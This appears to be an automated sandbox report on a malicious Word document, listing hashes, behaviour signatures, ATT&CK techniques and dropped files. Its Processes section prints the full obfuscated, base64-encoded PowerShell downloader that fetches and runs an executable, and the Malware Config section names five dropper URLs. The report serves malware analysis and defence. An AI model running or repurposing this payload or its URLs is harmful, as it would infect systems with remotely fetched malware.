Analysis

  • max time kernel
    134s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-05-2024 23:19

General

  • Target

    5037ff6b709db5b24239f90256b800b4JaffaCakes118.doc

  • Size

    155KB

  • MD5

    5037ff6b709db5b24239f90256b800b4

  • SHA1

    5315d99f5f0552777c3a16a6ab5fdc455f86ddbb

  • SHA256

    afd6940f7201824355e52ff193f809f8ab9aad69a1e86b1b3ded184726096065

  • SHA512

    02553a8d3343297a1bb6c59ca4801fea0d4e01f9f6076e768053cf86e56fa804af9b230424b60783bce1c072c3874d6ff9dfd1f6458b120266d0f6557b06e1ef

  • SSDEEP

    3072:e4eOY5CTsdA93NbBEPzMziPmFdomccjCshT3mmC1YZQXfTaM7vtX:eTbsbiIziPmFdomXBV3mL1YZQXfvvtX

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.atuteb.com/wp-content/themes/xy/

exe.dropper

http://darthgoat.com/files/vq2V/

exe.dropper

http://mifida-myanmar.com/wp-includes/ishN/

exe.dropper

http://ragnar.net/cgi-bin/lFGs9/

exe.dropper

http://sama-woocommerce-application.com/demo/nxQtT/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5037ff6b709db5b24239f90256b800b4JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3172
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -e JABkAFgAQQBvAFEAQQBBAEEAPQAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAEEAJwAsACcAcwBBAEMAJwApACwAJwBBACcAKQAsACcAbwAnACkAOwAkAGoAQQBBAG8AXwBCACAAPQAgACcANAAwADkAJwA7ACQAYwBYAEEAQQBHAFoARABrAD0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBVACcALAAnAEwAawBVACcAKQAsACcAUQBBACcAKQA7ACQAQQBBAEEAQQBBAEQAUQBCAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABqAEEAQQBvAF8AQgArACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwAuACcALAAnAGUAeABlACcAKQA7ACQASABBADEAMQBCAG8APQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwA0ACcALAAnAEEAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAGMAQwAnACwAJwBBAF8AJwApACkALAAnAEEAJwAsACcAdwAnACkAOwAkAEoAQQBvAFEAbwBVAD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABuAGAAZQB0AGAALgB3AEUAYgBjAGwASQBlAG4AVAA7ACQASwBjAGsAQQBaAGsAPQAoACIAewA0ADgAfQB7ADQANQB9AHsAMwA5AH0AewA3AH0AewAwAH0AewA1ADYAfQB7ADMANgB9AHsAMgA3AH0AewA0ADMAfQB7ADMAOAB9AHsANAA0AH0AewA0ADIAfQB7ADUAMQB9AHsANQAwAH0AewAxADIAfQB7ADQAOQB9AHsAMQA2AH0AewA1ADMAfQB7ADQAfQB7ADMAMgB9AHsAMQAwAH0AewAzADUAfQB7ADMAMQB9AHsAOQB9AHsANAAwAH0AewAxADQAfQB7ADMANAB9AHsAMgA1AH0AewAyADIAfQB7ADEANwB9AHsAMwAwAH0AewAxAH0AewAyADQAfQB7ADQANwB9AHsAMQA5AH0AewA1ADUAfQB7ADYAfQB7ADIAOAB9AHsAMgAzAH0AewAxADEAfQB7ADIAMAB9AHsANAA2AH0AewAyAH0AewAyADkAfQB7ADEAOAB9AHsANAAxAH0AewAzAH0AewAxADMAfQB7ADEANQB9AHsANQAyAH0AewA1AH0AewAyADEAfQB7ADMAMwB9AHsAMgA2AH0AewA1ADcAfQB7ADgAfQB7ADUANAB9AHsAMwA3AH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAG8AbQAvACcALAAnAGMAJwApACwAJwAvACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAGkAbgAvACcALAAnAGIAJwApACwAJwAvAEAAJwAsACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACcALwBAACcALAAnAGgAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwAvACcALAAnAHYAcQAyAFYAJwApACkALAAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcAYwBvAG0AJwAsACcAbQAnACwAJwBlAHIAJwApACwAJwAvAGkAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAdAAnACwAJwBlAGIALgAnACwAJwB1AHQAJwApACwAJwBlACcALAAnAG0AaQAnACwAJwBwADoAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAOgAnACwAJwAvAC8AcgAnACkALAAnAHQAcAAnACkALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBnACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAYQAnACwAJwByAHQAaAAnACkAKQAsACcAaAB0AHQAJwAsACcAZAAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAC8AcwAnACwAJwBwADoALwAnACkALAAnAHQALgAnACwAJwAuAGMAbwAnACwAJwBGAEcAJwAsACcAYwBsAHUAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAYQAnACwAJwBnAG4AYQByACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAYwBnACcALAAnAHQALwAnACkALAAnAC4AbgBlACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAYQAnACwAJwBjAGUALQAnACkALAAnAHAAJwApACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAG4AbQAnACwAJwBhAHIAJwApACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcATgAvAEAAJwAsACcAaAB0ACcAKQAsACcAdwBwAC0AJwAsACcAbQB5AGEAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAC4AJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAYQB0ACcALAAnAGkAbwBuACcAKQApACwAJwB0ACcALAAnAHMAaAAnACwAJwBsACcALAAnAG0AJwAsACcALwAnACwAJwB0AHQAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAGkAYwAnACwAJwBwAGwAJwApACwAJwBhAC0AJwAsACcALwAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBwAC0AYwAnACwAJwBvAG4AJwApACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAbgAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwB0AFQALwAnACwAJwB4AFEAJwApACkALAAnAG0AJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHcALgBhACcALAAnAC8AdwB3ACcAKQAsACcAZgBpACcALAAnAHMAOQAnACwAJwB4ACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwB0AGgAZQAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAZQBuACcALAAnAHQALwAnACkAKQAsACcAZQBzAC8AJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnADoALwAnACwAJwB0AHQAcAAnACkALAAnAGkALQAnACwAJwBpAG4AJwAsACcAaAAnACwAJwBvAGEAJwAsACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiACAALQBmACcALwBkACcALAAnAHQAdAAnACwAJwBwADoALwAnACkALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBoACcALAAnAHkALwBAACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbwBvACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAC0AdwAnACwAJwBhAG0AYQAnACkAKQAsACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAGYAaQBsAGUAJwAsACcAcwAnACkALAAnAGMAJwAsACcAbwBtAC8AJwApACwAJwBtAG8ALwAnACwAJwBkAGUAcwAnACwAJwB3ACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBtAC8AZAAnACwAJwBjAG8AJwApACkALgAiAHMAYABQAGwAaQBUACIAKAAnAEAAJwApADsAJABxAEIARABEAEEANABDAD0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwB3AEEAJwAsACcAdwBBACcAKQAsACcAeAAnACkALAAnADEAJwApADsAZgBvAHIAZQBhAGMAaAAoACQASABBAEQANABBAEIAXwB3ACAAaQBuACAAJABLAGMAawBBAFoAawApAHsAdAByAHkAewAkAEoAQQBvAFEAbwBVAC4AIgBkAE8AYABXAGAATgBgAEwATwBBAGQAZgBJAEwAZQAiACgAJABIAEEARAA0AEEAQgBfAHcALAAgACQAQQBBAEEAQQBBAEQAUQBCACkAOwAkAEIARwB3ADQAbwBjAD0AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBjAEQAJwAsACcAQQAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBIACcALAAnAEEAQQBrACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEEAQQBBAEEAQQBEAFEAQgApAC4AIgBsAEUATgBgAEcAdABIACIAIAAtAGcAZQAgADMANQA3ADMAMQApACAAewAuACgAJwBJAG4AdgBvAGsAJwArACcAZQAtAEkAdABlACcAKwAnAG0AJwApACAAJABBAEEAQQBBAEEARABRAEIAOwAkAHoAQQBRAGsARwBEADQAQQA9ACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHcAawBDACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAG8AJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcARABDAEcAJwAsACcAWgAnACkAKQApADsAYgByAGUAYQBrADsAJAB6AEIAVQBvAHgAXwBRAEEAPQAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAnAG8AWAAnACwAJwBEAEEAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBBACcALAAnAFoAWgBBACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJAB6AHcAQQBCAFUARABYAEEAPQAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBEAG8AVQAnACwAJwBBAEEAJwApACwAJwBRACcAKQAsACcAcwAnACkA
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2032

Network

MITRE ATT&CK Matrix ATT&CK v13

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD82E0.tmp\sist02.xsl
    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mejbvoev.2xb.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2032-47-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/2032-550-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/2032-57-0x000001E32CE60000-0x000001E32CE82000-memory.dmp
    Filesize

    136KB

  • memory/3172-11-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-37-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-7-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-8-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-10-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-0-0x00007FFD893F0000-0x00007FFD89400000-memory.dmp
    Filesize

    64KB

  • memory/3172-12-0x00007FFD87390000-0x00007FFD873A0000-memory.dmp
    Filesize

    64KB

  • memory/3172-9-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-16-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-15-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-17-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-14-0x00007FFD87390000-0x00007FFD873A0000-memory.dmp
    Filesize

    64KB

  • memory/3172-18-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-21-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-22-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-20-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-19-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-13-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-36-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-6-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-44-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-45-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-46-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-3-0x00007FFDC940D000-0x00007FFDC940E000-memory.dmp
    Filesize

    4KB

  • memory/3172-5-0x00007FFD893F0000-0x00007FFD89400000-memory.dmp
    Filesize

    64KB

  • memory/3172-4-0x00007FFD893F0000-0x00007FFD89400000-memory.dmp
    Filesize

    64KB

  • memory/3172-64-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-65-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-2-0x00007FFD893F0000-0x00007FFD89400000-memory.dmp
    Filesize

    64KB

  • memory/3172-525-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-544-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-545-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB

  • memory/3172-1-0x00007FFD893F0000-0x00007FFD89400000-memory.dmp
    Filesize

    64KB

  • memory/3172-571-0x00007FFD893F0000-0x00007FFD89400000-memory.dmp
    Filesize

    64KB

  • memory/3172-574-0x00007FFD893F0000-0x00007FFD89400000-memory.dmp
    Filesize

    64KB

  • memory/3172-573-0x00007FFD893F0000-0x00007FFD89400000-memory.dmp
    Filesize

    64KB

  • memory/3172-572-0x00007FFD893F0000-0x00007FFD89400000-memory.dmp
    Filesize

    64KB

  • memory/3172-575-0x00007FFDC9370000-0x00007FFDC9565000-memory.dmp
    Filesize

    2.0MB